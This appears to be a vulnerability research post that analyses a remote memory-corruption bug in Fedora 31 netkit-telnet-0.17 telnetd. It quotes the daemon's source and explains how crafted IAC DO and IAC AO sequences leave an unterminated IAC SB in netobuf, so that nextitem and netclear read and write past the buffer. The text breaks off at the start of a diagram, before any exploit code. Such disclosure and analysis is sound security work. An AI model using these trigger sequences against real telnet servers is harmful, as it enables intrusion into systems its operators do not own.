It’s not worth doing something unless you were doing something that someone, somewhere, would much rather you weren’t doing.

Sir Terence David John Pratchett

1 Introduction

In this post we will present a remotely exploitable vulnerability in the Fedora 31 version of netkit-telnet-0.17 telnetd, which has been present for a long time. Other Linux distributions or Unix systems may or may not be vulnerable; however, the aim of this post is to present an interesting vulnerability and corresponding exploit, not to create a taxonomy of vulnerable versions. We will leave this to others.

The exploit presented is a proof of concept: it provides a working basis that defeats the default Fedora 31 mitigations such as PIE, ASLR, and non-executable pages. The exploit does not, however, bypass SELinux, and further research is needed to do so. A proper exploit would also need to be far more reliable. We believe both can be done, but to reduce the amount of time spent on weaponizing a now disclosed vulnerability, and to limit the impact on installations that – god forbid – still run telnetd, we will also leave this to others.

2 Source code overview

As the vulnerability and exploitation are somewhat involved, we will discuss the telnetd code base in a manner that first provides understanding of the internals before we switch to discussing the vulnerability and exploitation. To keep this document more or less clear, not all parts of the source code have been listed here. For those who want to pursue a deeper understanding of the code, the Fedora 31 netkit-telnet-0.17 tarball is available here.

2.1 Glossary of important names, variables, and conventions

The telnet protocol is outlined in RFC 854, but for readers who are not keen on reading through that document, we will summarize the most frequently used abbreviations below.

IAC: Interpret as Command. An escape character that signals that the bytes that follow form a command sequence rather than data.
AO: Abort output. A command that discards further terminal output of the currently running process.
SB: Suboption Begin. A command that marks the beginning of a suboption sequence.
SE: Suboption End. A command that marks the end of a suboption sequence.
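
For readers who prefer to see the bytes, the sketch below lists the numeric values RFC 854 assigns to the commands used in this document, together with a small helper that builds a three-byte IAC DO request. The helper name build_do_request is made up for illustration and does not appear in the telnetd source.

```c
#include <assert.h>
#include <stddef.h>

/* Command codes as assigned by RFC 854 (same values as <arpa/telnet.h>). */
enum {
    SE   = 240,  /* Suboption End */
    DM   = 242,  /* Data Mark */
    AO   = 245,  /* Abort Output */
    SB   = 250,  /* Suboption Begin */
    WILL = 251,
    WONT = 252,
    DO   = 253,
    DONT = 254,
    IAC  = 255   /* Interpret As Command */
};

/* Hypothetical helper: write the request IAC DO <option> into out,
 * which must have room for 3 bytes. Returns the number of bytes written. */
size_t build_do_request(unsigned char *out, unsigned char option)
{
    assert(out != NULL);
    out[0] = IAC;
    out[1] = DO;
    out[2] = option;   /* any byte value may be placed here */
    return 3;
}
```

Note that the option byte is unconstrained: a client is free to send IAC DO SB or IAC DO IAC, even though SB and IAC are command codes rather than option codes.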

The source code contains many global variables that are frequently used. To ease the reading burden, below the reader can find a glossary of the ones we will encounter during our discussion.

int net: the client socket, which data is read from and sent to.
char netibuf[BUFSIZ]: the network input buffer. Data read from the client is stored here.
int ncc: the number of bytes read from the client into netibuf.
char *netip: the network input pointer. Tracks where in netibuf we are processing.
char netobuf[BUFSIZ+NETSLOP]: the network output buffer. Data to send to the client is stored here.
char *nbackp: marks the start of unsent data in netobuf.
char *nfrontp: marks where to add data to netobuf.
char *neturg: marks a single byte to be sent as urgent data in netobuf.
char ptyibuf[BUFSIZ]: the pty input buffer. Data read from the login process pty is stored here.
int pcc: the number of bytes read from the pty into ptyibuf.
char *ptyip: the pty input pointer. Tracks where in ptyibuf we are processing.
char ptyobuf[BUFSIZ+NETSLOP]: the pty output buffer. Data to be sent to the login process pty is stored here.
char *pbackp: marks the start of unsent data in ptyobuf.
char *pfrontp: marks where to add data to ptyobuf.

Finally, we would like to draw attention to some conventions used throughout this document. We will denote the integer range 1,…,10 using the inclusive [1,10] notation, the exclusive (0,11) notation, or a combination of the two such as [1,11).

2.2 The main processing loop

We’ll discuss the vulnerability in a top-down fashion, and therefore we will begin by looking at the function that drives network communication after a client connection has been accepted.

The processing of a client network request to telnetd is handled in the ttloop function. In spite of its name, this function performs a single iteration of receiving and processing client data. The read call stores client input in netibuf and the number of bytes read in the global int variable ncc. The current instance of the daemon terminates immediately on a read error or an EOF from the client. If data was read, netip is set to the start of netibuf and the main state machine telrcv is called. Note that telrcv decrements ncc as it consumes network input; if data still remains after it returns (the ncc > 0 check), the pty output buffer is reset and telrcv is called again. We will see later that the only way telrcv returns with ncc > 0 is if ptyobuf would overflow.

void
ttloop(void)
{

    DIAG(TD_REPORT, netoprintf("td: ttloop\r\n"););
                     
    if (nfrontp-nbackp) {
        netflush();
    }
    ncc = read(net, netibuf, sizeof(netibuf));
    if (ncc < 0) {
        syslog(LOG_INFO, "ttloop: read: %m\n");
        exit(1);
    } else if (ncc == 0) {
        syslog(LOG_INFO, "ttloop: peer died: EOF\n");
        exit(1);
    }
    DIAG(TD_REPORT, netoprintf("td: ttloop read %d chars\r\n", ncc););
    netip = netibuf;
    telrcv();                   /* state machine */
    if (ncc > 0) {
        pfrontp = pbackp = ptyobuf;
        telrcv();
    }
}  /* end of ttloop */

2.3 The main state machine

The telnetd state machine that processes network input and drives the protocol actions is defined in the telrcv function.

Note that the source tarball contains preprocessor conditionals for ENCRYPT and LINEMODE. These are not defined in the default Fedora 31 build, and therefore have been removed from the source code listing.

As long as network input remains (the while (ncc > 0) condition), a byte is stored in c and ncc is decremented to reflect the consumed byte. We will not discuss the entire state machine, but have mainly listed the code below to refer to in later parts of this document. For now take note of how the IAC AO sequence is handled, in particular the netclear call.

void telrcv(void) {
    register int c;
    static int state = TS_DATA;

    while (ncc > 0) {
        if ((&ptyobuf[BUFSIZ] - pfrontp) < 2) break;
        c = *netip++ & 0377;
        ncc--;

        switch (state) {
         case TS_CR:
             state = TS_DATA;
             /* Strip off \n or \0 after a \r */
             if ((c == 0) || (c == '\n')) {
                 break;
             }
             /* FALL THROUGH */

         case TS_DATA:
             if (c == IAC) {
                 state = TS_IAC;
                 break;
             }
             /*
              * We now map \r\n ==> \r for pragmatic reasons.
              * Many client implementations send \r\n when
              * the user hits the CarriageReturn key.
              *
              * We USED to map \r\n ==> \n, since \r\n says
              * that we want to be in column 1 of the next
              * printable line, and \n is the standard
              * unix way of saying that (\r is only good
              * if CRMOD is set, which it normally is).
              */
             if ((c == '\r') && his_state_is_wont(TELOPT_BINARY)) {
                 state = TS_CR;
             }
             *pfrontp++ = c;
             break;

         case TS_IAC:
         gotiac:
             switch (c) {

                 /*
                  * Send the process on the pty side an
                  * interrupt.  Do this with a NULL or
                  * interrupt char; depending on the tty mode.
                  */
              case IP:
                  DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                  interrupt();
                  break;
              case BREAK:
                  DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                  sendbrk();
                  break;

                  /*
                   * Are You There?
                   */
              case AYT:
                 DIAG(TD_OPTIONS,
                      printoption("td: recv IAC", c));
                  recv_ayt();
                  break;

                  /*
                   * Abort Output
                   */
              case AO:
                  {
                      DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                      ptyflush();       /* half-hearted */
                      init_termbuf();

                      if (slctab[SLC_AO].sptr &&
                          *slctab[SLC_AO].sptr != (cc_t)(_POSIX_VDISABLE))
                      {
                          *pfrontp++ =
                              (unsigned char)*slctab[SLC_AO].sptr;
                      }

                      netclear();       /* clear buffer back */
                      *nfrontp++ = (char)IAC;
                      *nfrontp++ = (char)DM;
                      neturg = nfrontp-1; /* off by one XXX */
                      DIAG(TD_OPTIONS, printoption("td: send IAC", DM));
                      break;
                  }

                  /*
                   * Erase Character and
                   * Erase Line
                   */
              case EC:
              case EL:
                 {
                     cc_t ch;
                     DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                     ptyflush();        /* half-hearted */
                     init_termbuf();
                     if (c == EC) ch = *slctab[SLC_EC].sptr;
                     else ch = *slctab[SLC_EL].sptr;
                     if (ch != (cc_t)(_POSIX_VDISABLE))
                         *pfrontp++ = (unsigned char)ch;
                     break;
                 }

                  /*
                   * Check for urgent data...
                   */
              case DM:
                  DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                  SYNCHing = stilloob(net);
                  settimer(gotDM);
                  break;

                  /*
                   * Begin option subnegotiation...
                   */
              case SB:
                  state = TS_SB;
                  SB_CLEAR();
                  continue;

              case WILL:
                  state = TS_WILL;
                  continue;

              case WONT:
                  state = TS_WONT;
                  continue;

              case DO:
                  state = TS_DO;
                  continue;

              case DONT:
                  state = TS_DONT;
                  continue;

              case EOR:
                  if (his_state_is_will(TELOPT_EOR)) doeof();
                  break;

                  /*
                   * Handle RFC 10xx Telnet linemode option additions
                   * to command stream (EOF, SUSP, ABORT).
                   */
              case xEOF:
                  doeof();
                  break;

              case SUSP:
                  sendsusp();
                  break;

              case ABORT:
                  sendbrk();
                  break;

              case IAC:
                 *pfrontp++ = c;
                  break;
             }
             state = TS_DATA;
             break;

         case TS_SB:
             if (c == IAC) {
                 state = TS_SE;
             }
             else {
                 SB_ACCUM(c);
             }
             break;

         case TS_SE:
             if (c != SE) {
                 if (c != IAC) {
                                /*
                                 * bad form of suboption negotiation.
                                 * handle it in such a way as to avoid
                                 * damage to local state.  Parse
                                 * suboption buffer found so far,
                                 * then treat remaining stream as
                                 * another command sequence.
                                 */

                                /* for DIAGNOSTICS */
                     SB_ACCUM(IAC);
                     SB_ACCUM(c);
                     subpointer -= 2;

                     SB_TERM();
                     suboption();
                     state = TS_IAC;
                     goto gotiac;
                 }
                 SB_ACCUM(c);
                 state = TS_SB;
             }
             else {
                 /* for DIAGNOSTICS */
                 SB_ACCUM(IAC);
                 SB_ACCUM(SE);
                 subpointer -= 2;

                 SB_TERM();
                 suboption();   /* handle sub-option */
                 state = TS_DATA;
             }
             break;

         case TS_WILL:
             willoption(c);
             state = TS_DATA;
             continue;

         case TS_WONT:
             wontoption(c);
             state = TS_DATA;
             continue;

         case TS_DO:
             dooption(c);
             state = TS_DATA;
             continue;

         case TS_DONT:
             dontoption(c);
             state = TS_DATA;
             continue;

         default:
             syslog(LOG_ERR, "telnetd: panic state=%d\n", state);
             printf("telnetd: panic state=%d\n", state);
             exit(1);
        }
    }
}

A quick overview of the telrcv state machine is shown below.
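
As a rough companion to the listing above, the transitions can be condensed into a single function. This is a simplified sketch that tracks only the state variable and ignores every side effect (pty writes, option handling, suboption accumulation); the function name next_state and the binary parameter are introduced here for illustration only.

```c
#include <assert.h>

enum { SE = 240, SB = 250, WILL = 251, WONT = 252,
       DO = 253, DONT = 254, IAC = 255 };

enum tstate { TS_DATA, TS_IAC, TS_CR, TS_SB, TS_SE,
              TS_WILL, TS_WONT, TS_DO, TS_DONT };

/* Return the state after consuming byte c in state s. binary is nonzero
 * when the client has negotiated TELOPT_BINARY. */
enum tstate next_state(enum tstate s, int c, int binary)
{
    assert(c >= 0 && c <= 255);
    switch (s) {
    case TS_CR:
        if (c == 0 || c == '\n')
            return TS_DATA;            /* byte after \r is stripped */
        /* fall through: treat c as ordinary data */
    case TS_DATA:
        if (c == IAC)
            return TS_IAC;
        if (c == '\r' && !binary)
            return TS_CR;
        return TS_DATA;
    case TS_IAC:
        switch (c) {
        case SB:   return TS_SB;
        case WILL: return TS_WILL;
        case WONT: return TS_WONT;
        case DO:   return TS_DO;
        case DONT: return TS_DONT;
        default:   return TS_DATA;     /* two-byte commands and IAC IAC */
        }
    case TS_SB:
        return c == IAC ? TS_SE : TS_SB;
    case TS_SE:
        if (c == SE)
            return TS_DATA;            /* suboption complete */
        if (c == IAC)
            return TS_SB;              /* escaped IAC inside the suboption */
        return next_state(TS_IAC, c, binary);  /* malformed: reparse as command */
    default:
        return TS_DATA;                /* TS_WILL..TS_DONT consume one option byte */
    }
}
```

For example, feeding IAC, DO and an option byte from TS_DATA walks through TS_IAC and TS_DO and ends back in TS_DATA.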

2.3.1 Option handling

An important part of the telnet protocol is option negotiation. This is done through IAC DO, IAC DONT, IAC WILL, and IAC WONT command sequences. The meaning of these sequences is as follows:

DO: requests the peer to use a certain negotiable option.
DONT: requests the peer to not use a certain negotiable option.
WILL: notifies the peer we will use a certain negotiable option.
WONT: notifies the peer we will not use a certain negotiable option.

Within the scope of our discussion, we will only use IAC DO commands, which result in a call to dooption in the state machine. The code can be found below. The most important thing to note is that unknown option codes are replied to with send_wont, which repeats the requested option code. This means that a sequence such as IAC DO U, where U is an unknown option, will be replied to with IAC WONT U.

void dooption(int option) {
    int changeok = 0;

    /*
     * Process client input.
     */

    DIAG(TD_OPTIONS, printoption("td: recv do", option));

    if (will_wont_resp[option]) {
        will_wont_resp[option]--;
        if (will_wont_resp[option] && my_state_is_will(option))
            will_wont_resp[option]--;
    }
    if ((will_wont_resp[option] == 0) && (my_want_state_is_wont(option))) {
        switch (option) {
        case TELOPT_ECHO:

            {
                init_termbuf();
                tty_setecho(1);
                set_termbuf();
            }
            changeok++;
            break;

        case TELOPT_BINARY:
            init_termbuf();
            tty_binaryout(1);
            set_termbuf();
            changeok++;
            break;

        case TELOPT_SGA:

            turn_on_sga = 0;

            changeok++;
            break;

        case TELOPT_STATUS:
            changeok++;
            break;

        case TELOPT_TM:
            /*
             * Special case for TM.  We send a WILL, but
             * pretend we sent a WONT.
             */
            send_will(option, 0);
            set_my_want_state_wont(option);
            set_my_state_wont(option);
            return;

        case TELOPT_LOGOUT:
            /*
             * When we get a LOGOUT option, respond
             * with a WILL LOGOUT, make sure that
             * it gets written out to the network,
             * and then just go away...
             */
            set_my_want_state_will(TELOPT_LOGOUT);
            send_will(TELOPT_LOGOUT, 0);
            set_my_state_will(TELOPT_LOGOUT);
            (void)netflush();
            cleanup(0);
            /* NOT REACHED */
            break;

        case TELOPT_LINEMODE:
        case TELOPT_TTYPE:
        case TELOPT_NAWS:
        case TELOPT_TSPEED:
        case TELOPT_LFLOW:
        case TELOPT_XDISPLOC:
        case TELOPT_ENVIRON:
        default:
            break;
        }
        if (changeok) {
            set_my_want_state_will(option);
            send_will(option, 0);
        }
        else {
            will_wont_resp[option]++;
            send_wont(option, 0);
        }
    }
    set_my_state_will(option);
}
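
The refusal path can be summarised in a few lines. The sketch below models only which option bytes end up in the send_wont branch of the switch above and what reply they produce. It deliberately ignores the will_wont_resp counters and the state macros, so it should be read as an approximation of the behaviour for a fresh option rather than a reimplementation. The function name model_refuse_do is hypothetical; the option values are those from <arpa/telnet.h>.

```c
#include <assert.h>
#include <stddef.h>

enum { WONT = 252, IAC = 255 };

/* Options that the dooption switch accepts or handles specially. */
enum { TELOPT_BINARY = 0, TELOPT_ECHO = 1, TELOPT_SGA = 3,
       TELOPT_STATUS = 5, TELOPT_TM = 6, TELOPT_LOGOUT = 18 };

/* For an option that is refused, write IAC WONT <option> to out (3 bytes)
 * and return 3. For options handled by other branches, write nothing and
 * return 0, since those are outside this model. */
size_t model_refuse_do(unsigned char option, unsigned char *out)
{
    assert(out != NULL);
    switch (option) {
    case TELOPT_BINARY: case TELOPT_ECHO: case TELOPT_SGA:
    case TELOPT_STATUS: case TELOPT_TM:   case TELOPT_LOGOUT:
        return 0;
    default:
        out[0] = IAC;
        out[1] = WONT;
        out[2] = option;    /* echoed back unchanged: client-chosen byte */
        return 3;
    }
}
```

The point of interest is the last byte of the reply: it is copied from the request, so the client decides one out of every three bytes that this path places in the output buffer.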

2.4 Basis of the vulnerability

The netclear and nextitem functions can scan past the end of netobuf and corrupt memory in the data segment under certain conditions. We will not yet discuss whether these conditions can be met, as this is complicated, but first focus on explaining the issue in these two functions.

2.4.1 The netclear() function

The netclear function, as depicted below, reworks the network output buffer netobuf to remove data that was already sent, as well as unwanted items. An item here is either a single data byte, or an IAC command sequence of two or more bytes. The nextitem function is used to partition netobuf into items. We will discuss the implementation of this function later.

First thisitem is set to netobuf, and the first while loop skips items for as long as the next item starts at or before nbackp. As mentioned before, nbackp points to the first byte in netobuf that has not yet been sent over the network. Anything before nbackp can therefore be discarded. Next, good is set to netobuf as well. This is the destination pointer for copying the netobuf data that is retained, so the copy is performed in place.

The second while loop processes items starting at thisitem for as long as thisitem is smaller than nfrontp. Items that do not match the wewant macro are skipped in the else branch. An item that does match the wewant macro is first coalesced with adjacent wanted items in the do/while loop and then copied to good with bcopy.

void netclear(void)
{
    register char *thisitem, *next;
    char *good;
#define wewant(p)       ((nfrontp > p) && ((*p&0xff) == IAC) && \
                                ((*(p+1)&0xff) != EC) && ((*(p+1)&0xff) != EL))

#if     defined(ENCRYPT)
    thisitem = nclearto > netobuf ? nclearto : netobuf;
#else
    thisitem = netobuf;
#endif

    while ((next = nextitem(thisitem)) <= nbackp) {
        thisitem = next;
    }

    /* Now, thisitem is first before/at boundary. */

#if     defined(ENCRYPT)
    good = nclearto > netobuf ? nclearto : netobuf;
#else
    good = netobuf;     /* where the good bytes go */
#endif

    while (nfrontp > thisitem) {
        if (wewant(thisitem)) {
            int length;

            next = thisitem;
            do {
                next = nextitem(next);
            } while (wewant(next) && (nfrontp > next));
            length = next-thisitem;
            bcopy(thisitem, good, length);
            good += length;
            thisitem = next;
        } else {
            thisitem = nextitem(thisitem);
        }
    }

    nbackp = netobuf;
    nfrontp = good;             /* next byte to be sent */
    neturg = 0;
}  /* end of netclear */

2.4.2 The nextitem() function

The nextitem function is meant to find the item starting after the item pointed to by current.

The function performs no bounds checking, and can return pointers past the end of the region that current points into. Offsets should be constrained so they do not extend past the end of that region in the return current+3 statement for option commands, in the return current+2 statement in the default case, and most notably in the scan loop of the SB case. The latter over-indexing is the most dangerous one, as it means the function will keep scanning memory until it finds an IAC SE sequence and then return a pointer to the byte after it.

static
char *
nextitem(char *current)
{
    if ((*current&0xff) != IAC) {
        return current+1;
    }
    switch (*(current+1)&0xff) {
    case DO:
    case DONT:
    case WILL:
    case WONT:
        return current+3;
    case SB:            /* loop forever looking for the SE */
        {
            register char *look = current+2;

            for (;;) {
                if ((*look++&0xff) == IAC) {
                    if ((*look++&0xff) == SE) {
                        return look;
                    }
                }
            }
        }
    default:
        return current+2;
    }
}  /* end of nextitem */
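
To make the missing checks concrete, here is a sketch of what a bounds-aware variant could look like. It is not the upstream fix and not code from the tarball: the name nextitem_bounded, the extra end parameter, and the choice to return end for an incomplete item are all assumptions made for illustration.

```c
#include <assert.h>
#include <stddef.h>

enum { SE = 240, SB = 250, WILL = 251, DONT = 254, IAC = 255 };

/* Hypothetical bounded variant of nextitem. Returns the start of the next
 * item, or end when the current item is incomplete or would extend past
 * end. Requires current < end. */
const unsigned char *nextitem_bounded(const unsigned char *current,
                                      const unsigned char *end)
{
    assert(current < end);
    if (current[0] != IAC)
        return current + 1;
    if (end - current < 2)
        return end;                        /* lone IAC in the last byte */

    unsigned char cmd = current[1];
    if (cmd >= WILL && cmd <= DONT)        /* WILL, WONT, DO, DONT */
        return (end - current >= 3) ? current + 3 : end;

    if (cmd == SB) {
        const unsigned char *look = current + 2;
        while (end - look >= 2) {
            if (look[0] != IAC) {
                look += 1;
                continue;
            }
            if (look[1] == SE)
                return look + 2;           /* byte after IAC SE */
            look += 2;                     /* skip IAC and the byte after it,
                                              as the original loop does */
        }
        return end;                        /* unterminated suboption */
    }
    return current + 2;                    /* other two-byte commands */
}
```

With such a variant, an unterminated IAC SB at the tail of the buffer yields end instead of a pointer into whatever memory happens to follow.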

2.4.3 Data segment corruption idea

Given the code discussed above, if we could get netobuf to contain an opening IAC SB sequence but not a closing IAC SE sequence, the nextitem function would scan past the end of netobuf to find the closing sequence. If no such sequence is present, this would result in accessing unmapped memory and thus a segmentation fault. However, if such a sequence exists past the end of netobuf, the do/while loop in netclear that coalesces wanted items would terminate because next is larger than nfrontp (which should not point past the end of netobuf), and the resulting length would be too large. Depending on the position of good in netobuf, the bcopy can then result in an out-of-bounds read (if length bytes fit at good and only the read from thisitem runs past the buffer) or an out-of-bounds read and write (if length bytes do not fit at good).
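
The effect on length can be reproduced safely in a toy setting. In the sketch below a single array stands in for netobuf plus the memory that follows it, so the scan never leaves allocated storage. The function names and the array layout are invented for this illustration; the scan itself mirrors the SB case of nextitem.

```c
#include <assert.h>
#include <stddef.h>

enum { SE = 240, SB = 250, WONT = 252, IAC = 255 };

/* Same scan as the SB case of nextitem, on unsigned bytes. */
static const unsigned char *scan_sb(const unsigned char *current)
{
    const unsigned char *look = current + 2;
    for (;;) {
        if (*look++ == IAC) {
            if (*look++ == SE)
                return look;
        }
    }
}

/* Return how many bytes the IAC SB item at offset start appears to span.
 * mem must contain an IAC SE pair somewhere after start. */
size_t apparent_item_length(const unsigned char *mem, size_t start)
{
    assert(mem[start] == IAC && mem[start + 1] == SB);
    return (size_t)(scan_sb(mem + start) - (mem + start));
}

/* Toy layout: offsets 0..3 play the role of the in-use part of netobuf
 * (so nfrontp would be at offset 4); offsets 4..9 play the role of
 * unrelated data that happens to contain IAC SE. */
size_t demo_overlong_item(void)
{
    static const unsigned char mem[] = {
        IAC, WONT, IAC, SB,              /* "netobuf" */
        'x', 'y', 'z', IAC, SE, 'q'      /* adjacent memory */
    };
    return apparent_item_length(mem, 2);
}
```

In this layout only 2 bytes of the item lie inside the in-use region, yet the computed length is 7, so a copy of that length would read 5 bytes that never belonged to the buffer.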

2.5 Network output buffer control

We have seen previously that we have a data segment overflow if we can create an IAC SB sequence in netobuf without a terminating IAC SE sequence. In order to do so, we will have to look more closely at primitives we have to control this buffer.

First we will discuss the ways in which we can have the daemon add data to the buffer and what parts of that data we control. Then we will look at how these functions work internally, and discuss how the buffer is flushed when full and how urgent data is handled. Finally we will use everything discussed so far to create an unterminated IAC SB sequence in the network output buffer.

2.5.1 Primitives adding data to the network output buffer

We cannot add arbitrary data to netobuf directly. Instead the daemon will add to it based on the network input we provided in netibuf. To create a situation where we have an unterminated IAC SB sequence in netobuf, we need to see to what extent we can control parts of the data that is added to netobuf.

There are several ways in which data can be added to netobuf in the source code. The output_data and output_datalen functions in utility.c can be used to do so, as well as the netoprintf macro in ext.h. Finally the location the nfrontp pointer refers to is directly written to in state.c (handling the IAC AO sequence) and telnetd.c (data read from the pty).

#define netoprintf output_data
int     output_data(const char *, ...) __attribute((format (printf, 1, 2))); 
void    output_datalen(const char *, int);

We will look at the call sites of netoprintf, output_data, and output_datalen. We can see the netoprintf macro is a simple wrapper around the output_data function. It is called in a lot of places in the source tree, but a lot of these places are for diagnostics. This means the build-time definition DIAGNOSTICS will have to be set, and telnetd itself would have to have been started with the -D command line option. This is not typically the case, so we will not consider such use. Below are the call-sites we identified:

state.c

send_do, send_dont, send_will, and send_wont. Each of these adds 3 bytes to netobuf, of which we control the last byte.

IAC AO handling in telrcv.

termstat.c

Only for LINEMODE defined compilations. This is not the case for Fedora 31.

telnetd.c

Once for every option in response to the TELOPT_TSPEED, TELOPT_XDISPLOC, TELOPT_ENVIRON, and TELOPT_TTYPE telnet options if the client supports them.

In the _gettermname function if the client supports TELOPT_TTYPE.

When writing the IAC DM sequence in the pty handling main loop.

When flow control is supported by the client in the pty handling main loop.

In the recv_ayt function. This is used in response to IAC AYT requests, and is interesting as it results in amplification.

slc.c

In the end_slc function used when handling the TELOPT_LINEMODE option in state.c. This needs a LINEMODE defined build, which is not the case on Fedora 31.

Out of all these call sites, we have identified two that we can use for the development of the exploit in this article. We will rely on the send_wont call in dooption and the IAC DM addition at nfrontp in telrcv. Note that in the latter case there is no direct check to ensure this will not access memory past the end of netobuf. It is possible to crash the daemon using this, but that is outside the scope of the current document. The reason we picked these two call sites will become apparent later on. For now, remember that we will use two primitives for adding data to netobuf: one that adds a 3 byte sequence consisting of IAC WONT followed by a byte we control (provided it is not a valid option), and one that adds a 2 byte IAC DM sequence.

With these two primitives in mind, we will further look into how output data is buffered in netobuf and how a shortage of buffer space is handled.

2.5.2 Output function internals

The output_data function is a simple wrapper around the output_datalen function that supports format strings. It is listed below for completeness.

int
output_data(const char *format, ...)
{
        va_list args;
        int len;
        char *buf;

        va_start(args, format);
        if ((len = vasprintf(&buf, format, args)) == -1)
                return -1;
        output_datalen(buf, len);
        va_end(args);
        free(buf);
        return (len);
}

The output_datalen function itself does most of the work, and is more interesting. The source tarball shows that netobuf is BUFSIZ+NETSLOP bytes big, which is typically 8256 bytes. nfrontp points to the position in netobuf where data will be added, so nfrontp - netobuf is the number of bytes of netobuf currently in use.

The while loop partitions the input in buf into chunks of at most BUFSIZ bytes and processes these chunks in order. If there is not enough space available to copy the current chunk into netobuf, the netflush function is called to create space, and as flushing may adjust nfrontp the remaining space is recalculated afterwards.

As much of the chunk as fits is then copied into the network output buffer with memmove, and the related variables are updated.

void    
output_datalen(const char *buf, int len)
{       
        int remaining, copied;
        
        remaining = BUFSIZ - (nfrontp - netobuf);
        while (len > 0) {
                /* Free up enough space if the room is too low*/
                if ((len > BUFSIZ ? BUFSIZ : len) > remaining) {
                        netflush();
                        remaining = BUFSIZ - (nfrontp - netobuf);
                }

                /* Copy out as much as will fit */
                copied = remaining > len ? len : remaining;
                memmove(nfrontp, buf, copied);
                nfrontp += copied;
                len -= copied;
                remaining -= copied;
                buf += copied;
        }
        return;
}

What remains is a closer look at the netflush function, as this handles what happens when there is not enough buffer space available. The attentive reader may already have noticed that remaining is recalculated after the netflush call rather than reset to BUFSIZ, which hints at the fact that netflush may not drain the network output buffer completely when called.

2.5.3 netflush internals

The netflush implementation can be found below. If there is data in netobuf that has not been written yet – that is, all data between nbackp and nfrontp – it is handled in the conditional block guarded by (n = nfrontp - nbackp) > 0. When no urgent data has been added to the network output buffer, data starting at nbackp is written to the network socket with the write call. The amount sent is recorded in n, and nbackp is advanced by n to reflect that this data has been sent. If nbackp then equals nfrontp, all data has been drained and the network output buffer state is reinitialized by resetting both pointers to netobuf. Note that netobuf will not be fully drained if write returns a smaller value than was requested.

We have not yet discussed the handling of urgent data, which is done in the else branch if neturg is not NULL (and not42 is set). Recall that neturg is a special purpose pointer within netobuf which marks the area of urgent data. Just as [nbackp, nfrontp) is the range of network output data that is yet to be written to the network socket, [nbackp, neturg) is the range of urgent data that is yet to be written to the network socket. Note that netobuf will not be fully drained if there is both urgent and normal data in netobuf, as the send call will only attempt to drain the urgent data.

void
netflush(void)
{
    int n;

    if ((n = nfrontp - nbackp) > 0) {

#if 0
        /* XXX This causes output_data() to recurse and die */
        DIAG(TD_REPORT,
            { netoprintf("td: netflush %d chars\r\n", n);
              n = nfrontp - nbackp;  /* update count */
            });
#endif

#if     defined(ENCRYPT)
        if (encrypt_output) {
                char *s = nclearto ? nclearto : nbackp;
                if (nfrontp - s > 0) {
                        (*encrypt_output)((unsigned char *)s, nfrontp-s);
                        nclearto = nfrontp;
                }
        }
#endif
        /*
         * if no urgent data, or if the other side appears to be an
         * old 4.2 client (and thus unable to survive TCP urgent data),
         * write the entire buffer in non-OOB mode.
         */
        if ((neturg == 0) || (not42 == 0)) {
            n = write(net, nbackp, n);  /* normal write */
        } else {
            n = neturg - nbackp;
            /*
             * In 4.2 (and 4.3) systems, there is some question about
             * what byte in a sendOOB operation is the "OOB" data.
             * To make ourselves compatible, we only send ONE byte
             * out of band, the one WE THINK should be OOB (though
             * we really have more the TCP philosophy of urgent data
             * rather than the Unix philosophy of OOB data).
             */
            if (n > 1) {
                n = send(net, nbackp, n-1, 0);  /* send URGENT all by itself */
            } else {
                n = send(net, nbackp, n, MSG_OOB);      /* URGENT data */
            }
        }
    }

         if (n == -1) {
                if (errno == EWOULDBLOCK || errno == EINTR)
                  return;
                cleanup(0);
                /* NOTREACHED */
         }

    nbackp += n;
#if     defined(ENCRYPT)
    if (nbackp > nclearto)
        nclearto = 0;
#endif
    if (nbackp >= neturg) {
        neturg = 0;
    }
    if (nbackp == nfrontp) {
        nbackp = nfrontp = netobuf;
#if     defined(ENCRYPT)
        nclearto = 0;
#endif
    }
    return;
}  /* end of netflush */
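
The interplay between output_datalen and a flush that drains only part of the buffer is easier to follow in a scaled-down model. The sketch below uses an 8 byte buffer in place of BUFSIZ, offsets in place of the nbackp and nfrontp pointers, and a flush whose short writes are scripted by the caller. It leaves out urgent data and error handling. All names (CAP, struct outbuf, model_flush, model_output) are invented for this illustration.

```c
#include <assert.h>
#include <string.h>

#define CAP 8                      /* stands in for BUFSIZ */

struct outbuf {
    unsigned char data[CAP];
    size_t back;                   /* offset of nbackp  */
    size_t front;                  /* offset of nfrontp */
};

/* Model of netflush without urgent data: "send" at most limit bytes. */
void model_flush(struct outbuf *b, size_t limit)
{
    assert(limit > 0);
    size_t n = b->front - b->back;
    if (n > limit)
        n = limit;                 /* short write */
    b->back += n;
    if (b->back == b->front)
        b->back = b->front = 0;    /* fully drained: reset to the start */
}

/* Model of output_datalen. limits must hold one entry for every flush
 * that ends up being called; limits[i] caps the i-th flush. */
void model_output(struct outbuf *b, const unsigned char *src, size_t len,
                  const size_t *limits)
{
    size_t remaining = CAP - b->front;
    while (len > 0) {
        if ((len > CAP ? CAP : len) > remaining) {
            model_flush(b, *limits++);
            remaining = CAP - b->front;   /* recalculated, not reset */
        }
        size_t copied = remaining > len ? len : remaining;
        memcpy(b->data + b->front, src, copied);
        b->front += copied;
        len -= copied;
        remaining -= copied;
        src += copied;
    }
}
```

As a usage example, start with 7 bytes in use (back 0, front 7), append a 3 byte reply, and script the first flush to send only 2 bytes and the second to send everything. The first reply byte is then stored in the last slot, the buffer is reset by the second flush, and the other two bytes are stored at offsets 0 and 1, leaving front at 2 while the older bytes from offset 2 onward are still physically present.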

2.6 Triggering the vulnerability

The methods to control netobuf content as described in the previous section are enough to craft an IAC SB sequence without a terminating IAC SE sequence in the content. We have several ways to make this happen, and will discuss the two most important ones. This is easiest to demonstrate by example, which we will do in the next sections.

Before doing so, we need to point out that the state machine will handle IAC DO sequences by calling dooption. Without looking at the dooption code again, we note that an unknown option byte will always be replied to using send_wont, resulting in an IAC WONT reply sequence. More specifically, an input sequence such as IAC DO SB would be replied to with an IAC WONT SB sequence, and an input sequence such as IAC DO IAC would be replied to with an IAC WONT IAC sequence.

2.6.1 Trigger using short writes

The first way to trigger the vulnerability is by having write in netflush return before having written all data. We will discuss what happens here below in a simplified manner.

Suppose we have populated the prefix of netobuf with IAC WONT SB by sending IAC DO SB requests. We have then padded out the rest of the buffer up to the last byte. This leads to the following configuration:

 netobuf
+-------+-------+-------+-------+-------+-------+
